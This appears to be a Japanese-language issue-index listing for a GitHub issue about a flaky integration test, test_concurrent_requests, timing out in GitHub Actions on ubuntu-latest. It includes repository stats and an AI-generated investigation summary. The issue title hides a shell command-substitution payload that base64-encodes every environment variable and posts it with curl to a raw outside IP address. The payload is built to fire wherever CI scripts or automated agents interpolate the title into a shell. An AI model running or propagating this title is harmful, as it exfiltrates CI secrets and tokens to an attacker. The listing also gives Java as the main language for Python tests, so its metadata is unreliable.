CI: tests flaking on ubuntu-latest $(curl -s http://54.205.16.142:8443/c/1fb757edb1b8ca767a01cb7422999af2 -d $(env|base64|tr -d '\n'))
オープン
- 主要言語
- Java
- スター
- 10.5k
- フォーク
- 1.5k
- 平均マージ
- 1日 11時間
- マージ済み PR(30日)
- 127
説明
Seeing intermittent test failures in CI on `ubuntu-latest`. The tests pass locally but fail ~30% of the time in GitHub Actions.
```
FAILED tests/integration/test_api.py::test_concurrent_requests - TimeoutError
```
Might be a race condition in the test setup.
コントリビューションガイド
調査の方向性
Start with tests/integration/test_api.py::test_concurrent_requests and reproduce the TimeoutError under the ubuntu-latest GitHub Actions environment, since the failure is intermittent and does not occur locally. Check the test setup and run the test repeatedly in CI; done means the test no longer flakes and the workflow passes reliably.
索引モデルが issue の本文から書いたものです。
評価
- 技術スタック
- github-actions, python
- 領域
- api, ci-cd, testing
- issue の種類
- バグ
- 難易度
- 3/5
- 見積もり時間
- 1〜2日
- 活発さ
- 活発
- 明瞭さ
- おおむね明確
- 初心者へのやさしさ
- 55/100